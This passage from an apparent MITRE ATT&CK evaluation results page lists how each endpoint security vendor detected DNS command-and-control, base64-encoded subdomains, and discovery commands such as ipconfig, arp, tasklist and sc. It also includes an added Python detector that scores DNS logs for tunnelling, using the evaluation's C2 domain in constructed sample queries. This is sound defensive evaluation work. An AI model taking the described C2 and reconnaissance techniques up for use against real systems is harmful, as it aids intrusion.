The Managed Defense Report indicated a Specific Behavior occurred because it identified that command and control occurred via DNS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a trace of DNS queries being made by rundll32.exe to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5]
GoSecure
Telemetry
Telemetry showed that DNS requests to freegoogleadsenseinfo.com (C2 domain) were being performed out of svchost.exe on Nimda. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Configuration Change)
Telemetry showed DNS requests to freegoogleadsenseinfo.com (C2 domain). The vendor stated that DNS telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events. [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed DNS requests to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2]
1.C.1 Data Encoding

Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Telemetry (Tainted)
Telemetry showed the base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Exfiltration alert. [1]
Cybereason
Telemetry (Tainted)
Telemetry showed base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
Telemetry (Tainted)
Telemetry showed base64-encoded DNS requests to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Cobalt Strike DNS Beacon alert. [1]
F-Secure
Telemetry
Telemetry showed a trace of encoded DNS queries being made by rundll32.exe to freegoogleadsenseinfo.com (C2 domain). [1]
GoSecure
None
No detection capability demonstrated for this procedure, though the capability identified DNS queries (no detection showed data encoding specifically).
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed DNS requests with encoded content to freegoogleadsenseinfo.com (the C2 domain). The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2]
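The three 1.C.1 procedures above (UDP/53, DNS as the C2 channel, base64-encoded subdomains) are separated in the results, but the vendors that alerted on them used the same features: CrowdStrike's "abnormally large DNS requests" and FireEye's "hardcoded DNS record name syntax" both come down to long, high-entropy labels repeated under one registered domain. The following is an added example of that scoring run over a constructed DNS query log; it is not code from MITRE or any evaluated vendor. The log shape, the thresholds and the sample queries (with deterministic stand-in encoded labels) are assumptions; the C2 domain is the one named in the evaluation.

```python
"""Score DNS query logs for C2-over-DNS and encoded-subdomain patterns: many
unique subdomains under one registered domain, long labels, and
high-entropy label text.

Added example for this page; not MITRE's or any vendor's code. The log
shape, thresholds and SAMPLE_QUERIES are assumptions.
"""
import base64
import math
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class DnsQuery:
    host: str
    process: str      # process the sensor attributed the query to
    qname: str


def shannon_entropy(text: str) -> float:
    """Bits per character of the text's character distribution."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> Tuple[str, str]:
    """(subdomain, registered domain). Takes the last two labels, which is
    wrong for suffixes like co.uk; use the public suffix list in production."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:]).lower()


def profile_domains(queries: List[DnsQuery], min_unique: int = 8,
                    min_label: int = 24, min_entropy: float = 3.5) -> List[dict]:
    """Aggregate per registered domain; alert when at least two of the three
    tunnelling indicators hold."""
    stats = defaultdict(lambda: {"subs": set(), "procs": set(),
                                 "longest": [], "entropy": []})
    for q in queries:
        sub, domain = split_name(q.qname)
        if not sub:
            continue
        d = stats[domain]
        d["subs"].add(sub)
        d["procs"].add(q.process)
        d["longest"].append(max(len(label) for label in sub.split(".")))
        d["entropy"].append(shannon_entropy(sub.replace(".", "")))
    alerts = []
    for domain, d in stats.items():
        n = len(d["subs"])
        mean_longest = sum(d["longest"]) / len(d["longest"])
        mean_entropy = sum(d["entropy"]) / len(d["entropy"])
        reasons = []
        if n >= min_unique:
            reasons.append(f"{n} unique subdomains")
        if mean_longest >= min_label:
            reasons.append(f"mean longest label {mean_longest:.0f} chars")
        if mean_entropy >= min_entropy:
            reasons.append(f"mean label entropy {mean_entropy:.2f} bits")
        if len(reasons) >= 2:
            alerts.append({"domain": domain, "processes": sorted(d["procs"]),
                           "queries": len(d["longest"]), "reasons": reasons,
                           "techniques": ["T1071 Standard Application Layer Protocol (T1071.004)",
                                          "T1132 Data Encoding (T1132.001)"]})
    return alerts


def encoded_label(i: int) -> str:
    """Deterministic stand-in for a beacon's 30-byte chunk; URL-safe base64
    keeps the label inside the characters DNS will carry (no '+' or '/')."""
    chunk = bytes((i * 37 + j * 11) % 256 for j in range(30))
    return base64.urlsafe_b64encode(chunk).decode().rstrip("=")


SAMPLE_QUERIES = (  # constructed: 12 beacon queries plus ordinary lookups
    [DnsQuery("Nimda", "rundll32.exe",
              f"{encoded_label(i)}.{i:03d}.freegoogleadsenseinfo.com") for i in range(12)]
    + [DnsQuery("Nimda", "svchost.exe", name) for name in
       ("www.google.com", "outlook.office365.com", "cdn.example.com",
        "mail.example.com", "a1b2.cdn.example.com")]
)

if __name__ == "__main__":
    for alert in profile_domains(SAMPLE_QUERIES):
        print(alert)
```

Two caveats the vendor notes illustrate. First, process attribution differs by sensor: a payload that resolves through the Windows DNS Client service is seen at the socket level as svchost.exe (which is why one vendor's telemetry above attributed the C2 lookups to svchost.exe on Nimda), while API-level hooks attribute them to rundll32.exe; the `processes` field is therefore evidence, not a key to group on. Second, seeing UDP/53 traffic (the Commonly Used Port procedure) is telemetry, not a detection, unless the sensor can say the traffic came from a process other than the resolver or went to a server other than the configured one; the domain-level profile above is what turns it into one.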
2.A.1 System Network Configuration Discovery

Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because ipconfig was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The process tree showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran ipconfig) were considered tainted and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry
Telemetry showed cmd.exe executing ipconfig with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched cmd.exe executing ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Tainted)
A General Behavior alert called Unusual Child Process of RunDLL32 was generated for cmd.exe executing ipconfig.exe with command-line arguments. The alert was tainted as part of the event tree under a parent Malicious File Detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing ipconfig.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that ipconfig.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
Enrichment
The capability enriched ipconfig.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing ipconfig) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running ipconfig) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing ipconfig.exe with command-line arguments and enriched the command with the condition Ipconfig All Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See the Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that the ipconfig utility displayed configuration information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry
Telemetry showed the execution sequence of cmd.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment (Tainted)
The capability enriched the execution of ipconfig.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Tainted)
A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Enrichment
The capability enriched arp.exe with a related ATT&CK Technique (T1018 - Remote System Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed cmd.exe executing arp.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because arp was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran arp) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed arp.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing arp.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that arp.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched arp.exe with an alert for Arp Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running arp) has been tagged for monitoring because its parent process has a detection (cmd.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched arp.exe indicating its usage can be a sign of reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched arp.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that the contents of the local ARP cache table were viewed. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe executing arp.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment (Tainted)
The capability enriched the execution of arp.exe as possible reconnaissance as well as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched arp.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe executing arp.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing arp.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing echo with command-line arguments. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran echo) were considered tainted. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because echo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing echo with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that echo was one of the commands used to enumerate the current username. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry showed the use of echo with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
F-Secure
Telemetry
Telemetry showed cmd.exe executing the echo command. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing the echo command) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running echo) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing the echo command. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched the cmd.exe echo command with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery) and a suspicious indicator that the command tried to identify the user on the system. [1] [2] [3] [4] [5] [6] [7]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing echo with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched cmd.exe executing echo with the correct ATT&CK Technique (System Owner/User Discovery). [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed cmd.exe executing echo with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing the taint is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Enrichment
The capability enriched tasklist.exe with the correct ATT&CK Technique (T1057 - Process Discovery). [1] [2] [3] [4]
Telemetry
Telemetry within the process tree showed cmd.exe executing tasklist.exe with command-line arguments. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran tasklist) were considered tainted. [1] [2] [3] [4] [5]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because tasklist was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing tasklist.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that tasklist was one of the commands used to enumerate current running processes. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5]
Enrichment
The capability enriched tasklist.exe with an alert for Tasklist Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running tasklist) has been tagged for monitoring because its parent process has a detection (cmd.exe). [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing tasklist) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed cmd.exe executing tasklist.exe along with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5]
Enrichment
The capability enriched tasklist.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Service Discovery) and a suspicious indicator that the process discovered running Windows services and/or processes. [1] [2] [3] [4] [5]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed the execution sequence of cmd.exe executing tasklist.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of tasklist.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched tasklist.exe executing with a related ATT&CK Technique (System Information Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
Telemetry
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing tasklist.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Enrichment
The capability enriched sc.exe with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the process tree showed cmd.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because sc query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran sc) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Enrichment (Tainted)
The capability enriched cmd.exe executing sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry showed cmd.exe executing sc with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing sc.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that sc was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running sc) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing sc with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing sc.exe with command-line arguments and enriched the command with the condition SC Query Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See the Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via the sc.exe/net.exe tool. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
